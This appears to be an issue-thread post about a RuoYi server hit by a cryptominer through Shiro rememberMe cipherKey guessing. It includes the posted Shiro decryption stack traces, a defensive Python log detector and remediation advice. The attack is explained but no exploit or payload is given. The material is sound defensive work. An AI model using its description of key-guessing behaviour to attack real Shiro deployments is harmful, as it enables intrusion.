I hit the same problem too. After deploying a RuoYi project, both the test and production systems had the mining trojan implanted; hoping for a fix.

Additional attack details
01:13:30.597 [http-nio-9070-exec-28] WARN o.a.s.m.AbstractRememberMeManager - [onRememberedPrincipalFailure,449] - There was a failure while trying to retrieve remembered principals. This could be due to a configuration problem or corrupted principals. This could also be due to a recently changed encryption key, if you are using a shiro.ini file, this property would be 'securityManager.rememberMeManager.cipherKey' see: http://shiro.apache.org/web.html#Web-RememberMeServices. The remembered identity will be forgotten and not used for this request.
01:13:30.599 [http-nio-9070-exec-28] WARN o.a.s.m.DefaultSecurityManager - [getRememberedIdentity,617] - Delegate RememberMeManager instance of type [org.apache.shiro.web.mgt.CookieRememberMeManager] threw an exception during getRememberedPrincipals().
org.apache.shiro.crypto.CryptoException: Unable to correctly extract the Initialization Vector or ciphertext.
at org.apache.shiro.crypto.JcaCipherService.decrypt(JcaCipherService.java:378)
at org.apache.shiro.mgt.AbstractRememberMeManager.decrypt(AbstractRememberMeManager.java:482)
at org.apache.shiro.mgt.AbstractRememberMeManager.convertBytesToPrincipals(AbstractRememberMeManager.java:419)
at org.apache.shiro.mgt.AbstractRememberMeManager.getRememberedPrincipals(AbstractRememberMeManager.java:386)
at org.apache.shiro.mgt.DefaultSecurityManager.getRememberedIdentity(DefaultSecurityManager.java:612)
at org.apache.shiro.mgt.DefaultSecurityManager.resolvePrincipals(DefaultSecurityManager.java:500)
at org.apache.shiro.mgt.DefaultSecurityManager.createSubject(DefaultSecurityManager.java:346)
at org.apache.shiro.subject.Subject$Builder.buildSubject(Subject.java:845)
at org.apache.shiro.web.subject.WebSubject$Builder.buildWebSubject(WebSubject.java:148)
at org.apache.shiro.web.servlet.AbstractShiroFilter.createSubject(AbstractShiroFilter.java:292)
at org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:359)
at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at com.alibaba.druid.support.http.WebStatFilter.doFilter(WebStatFilter.java:124)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:99)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:92)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.HiddenHttpMethodFilter.doFilterInternal(HiddenHttpMethodFilter.java:93)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:200)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:490)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:139)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:408)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:791)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1417)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:748)
Caused by: java.lang.ArrayIndexOutOfBoundsException: null
at java.lang.System.arraycopy(Native Method)
at org.apache.shiro.crypto.JcaCipherService.decrypt(JcaCipherService.java:370)
... 48 common frames omitted
01:13:31.558 [http-nio-9070-exec-29] WARN o.a.s.m.AbstractRememberMeManager - [onRememberedPrincipalFailure,449] - There was a failure while trying to retrieve remembered principals. This could be due to a configuration problem or corrupted principals. This could also be due to a recently changed encryption key, if you are using a shiro.ini file, this property would be 'securityManager.rememberMeManager.cipherKey' see: http://shiro.apache.org/web.html#Web-RememberMeServices. The remembered identity will be forgotten and not used for this request.
01:13:31.559 [http-nio-9070-exec-29] WARN o.a.s.m.DefaultSecurityManager - [getRememberedIdentity,617] - Delegate RememberMeManager instance of type [org.apache.shiro.web.mgt.CookieRememberMeManager] threw an exception during getRememberedPrincipals().
org.apache.shiro.crypto.CryptoException: Unable to execute 'doFinal' with cipher instance [javax.crypto.Cipher@1126cfed].
at org.apache.shiro.crypto.JcaCipherService.crypt(JcaCipherService.java:462)
at org.apache.shiro.crypto.JcaCipherService.crypt(JcaCipherService.java:445)
at org.apache.shiro.crypto.JcaCipherService.decrypt(JcaCipherService.java:390)
at org.apache.shiro.crypto.JcaCipherService.decrypt(JcaCipherService.java:382)
at org.apache.shiro.mgt.AbstractRememberMeManager.decrypt(AbstractRememberMeManager.java:482)
at org.apache.shiro.mgt.AbstractRememberMeManager.convertBytesToPrincipals(AbstractRememberMeManager.java:419)
at org.apache.shiro.mgt.AbstractRememberMeManager.getRememberedPrincipals(AbstractRememberMeManager.java:386)
at org.apache.shiro.mgt.DefaultSecurityManager.getRememberedIdentity(DefaultSecurityManager.java:612)
at org.apache.shiro.mgt.DefaultSecurityManager.resolvePrincipals(DefaultSecurityManager.java:500)
at org.apache.shiro.mgt.DefaultSecurityManager.createSubject(DefaultSecurityManager.java:346)
at org.apache.shiro.subject.Subject$Builder.buildSubject(Subject.java:845)
at org.apache.shiro.web.subject.WebSubject$Builder.buildWebSubject(WebSubject.java:148)
at org.apache.shiro.web.servlet.AbstractShiroFilter.createSubject(AbstractShiroFilter.java:292)
at org.apache.shiro.web.servlet.AbstractShiroFilter.doFilterInternal(AbstractShiroFilter.java:359)
at org.apache.shiro.web.servlet.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:125)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at com.alibaba.druid.support.http.WebStatFilter.doFilter(WebStatFilter.java:124)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.RequestContextFilter.doFilterInternal(RequestContextFilter.java:99)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.FormContentFilter.doFilterInternal(FormContentFilter.java:92)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.HiddenHttpMethodFilter.doFilterInternal(HiddenHttpMethodFilter.java:93)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.springframework.web.filter.CharacterEncodingFilter.doFilterInternal(CharacterEncodingFilter.java:200)
at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:107)
at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:193)
at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:166)
at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:199)
at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:96)
at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:490)
at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:139)
at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92)
at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:74)
at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:343)
at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:408)
at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:66)
at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:791)
at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1417)
at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49)
at java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1149)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:624)
at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61)
at java.lang.Thread.run(Thread.java:748)
Caused by: javax.crypto.BadPaddingException: Given final block not properly padded. Such issues can arise if a bad key is used during decryption.
at com.sun.crypto.provider.CipherCore.unpad(CipherCore.java:975)
at com.sun.crypto.provider.CipherCore.fillOutputBuffer(CipherCore.java:1056)
at com.sun.crypto.provider.CipherCore.doFinal(CipherCore.java:853)
at com.sun.crypto.provider.AESCipher.engineDoFinal(AESCipher.java:446)
at javax.crypto.Cipher.doFinal(Cipher.java:2168)
at org.apache.shiro.crypto.JcaCipherService.crypt(JcaCipherService.java:459)
... 51 common frames omitted
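What the log excerpt above shows is the server side of a key-guessing run against the rememberMe cookie: every candidate key that does not match produces one onRememberedPrincipalFailure warning, with BadPaddingException as the root cause for a wrong key, and "Unable to correctly extract the Initialization Vector" when the probe cookie is shorter than the IV Shiro expects at the front of the ciphertext. A key that does match produces no such warning. The Python below is an added example (not Shiro's or RuoYi's code) that parses those warnings and alerts on a burst of them; the log lines it runs on are constructed in the same shape as the ones posted above, and the window and threshold are assumptions to tune per deployment.

```python
"""Detect a Shiro rememberMe cipherKey guessing run from application logs.
Added example; log lines below are constructed, not copied from a real server."""
import re
from collections import Counter
from datetime import datetime, timedelta

# First line Shiro writes for every rememberMe cookie it cannot decrypt.
_FAILURE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d{3}) \[(?P<thread>[^\]]+)\] WARN "
    r"o\.a\.s\.m\.AbstractRememberMeManager - \[onRememberedPrincipalFailure"
)
_CAUSE = re.compile(r"^Caused by: (?P<exc>[\w.$]+)")
_SHORT_IV = "Unable to correctly extract the Initialization Vector"


def parse_failures(lines):
    """Group each rememberMe failure with its root cause.

    Returns dicts {ts, thread, reason}; reason is 'wrong_key' (BadPadding: the
    cookie was encrypted under some other key), 'short_ciphertext' (cookie bytes
    shorter than the IV; typical of a probe), or the exception class otherwise.
    Timestamps carry no date, so one day's log at a time is assumed.
    """
    events = []
    current = None
    for line in lines:
        m = _FAILURE.match(line)
        if m:
            current = {"ts": datetime.strptime(m["ts"], "%H:%M:%S.%f"),
                       "thread": m["thread"], "reason": "unknown"}
            events.append(current)
            continue
        if current is None or current["reason"] != "unknown":
            continue
        if _SHORT_IV in line:
            current["reason"] = "short_ciphertext"
        elif (c := _CAUSE.match(line)):
            current["reason"] = "wrong_key" if c["exc"].endswith("BadPaddingException") else c["exc"]
    return events


def detect_key_guessing(events, window=timedelta(seconds=60), threshold=5):
    """Alert when at least `threshold` failures fall inside one sliding `window`.

    A legitimate user produces at most one failure (a stale cookie after a key
    rotation) and then gets a fresh cookie; a tool walking a key list produces
    one failure per candidate, back to back.  Consecutive hits merge into one alert.
    """
    events = sorted(events, key=lambda e: e["ts"])
    alerts = []
    start = 0
    for end, ev in enumerate(events):
        while ev["ts"] - events[start]["ts"] > window:
            start += 1
        if end - start + 1 < threshold:
            continue
        run = events[start:end + 1]
        if alerts and alerts[-1]["last"] >= run[0]["ts"]:
            alerts[-1]["last"] = ev["ts"]
            alerts[-1]["count"] += 1
            alerts[-1]["reasons"][ev["reason"]] += 1
        else:
            alerts.append({"first": run[0]["ts"], "last": ev["ts"], "count": len(run),
                           "reasons": Counter(e["reason"] for e in run)})
    return alerts


def analyze(lines):
    return detect_key_guessing(parse_failures(lines))


def _constructed_failure(ts, kind):
    """Constructed excerpt shaped like the warnings posted in this issue."""
    head = (f"{ts} [http-nio-9070-exec-28] WARN o.a.s.m.AbstractRememberMeManager - "
            "[onRememberedPrincipalFailure,449] - There was a failure while trying to retrieve remembered principals.")
    if kind == "short":
        return [head,
                "org.apache.shiro.crypto.CryptoException: Unable to correctly extract the Initialization Vector or ciphertext.",
                "at org.apache.shiro.crypto.JcaCipherService.decrypt(JcaCipherService.java:378)",
                "Caused by: java.lang.ArrayIndexOutOfBoundsException: null"]
    return [head,
            "org.apache.shiro.crypto.CryptoException: Unable to execute 'doFinal' with cipher instance [javax.crypto.Cipher@1126cfed].",
            "at org.apache.shiro.crypto.JcaCipherService.crypt(JcaCipherService.java:462)",
            "Caused by: javax.crypto.BadPaddingException: Given final block not properly padded."]


# Constructed sample: one stale cookie at 00:50 (benign), then a probe and
# seven key guesses half a second apart at 01:13.
SAMPLE_LOG = _constructed_failure("00:50:02.118", "bad_key")
_base = datetime.strptime("01:13:30.597", "%H:%M:%S.%f")
for _i in range(8):
    _ts = (_base + timedelta(milliseconds=500 * _i)).strftime("%H:%M:%S.%f")[:-3]
    SAMPLE_LOG += _constructed_failure(_ts, "short" if _i == 0 else "bad_key")

if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG):
        print(a["first"].strftime("%H:%M:%S.%f")[:-3], "->", a["last"].strftime("%H:%M:%S.%f")[:-3],
              a["count"], "rememberMe decrypt failures", dict(a["reasons"]))
```

The single stale-cookie failure at 00:50 never reaches the threshold and produces no alert; the burst at 01:13 produces one alert covering all eight failures. Because a matching key leaves no warning, the useful follow-up to such an alert is to confirm the cipherKey is not a known default and to check the process tree of the JVM for the shell children described earlier in this thread.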

Change the cipherKey, or remove the Remember Me feature.
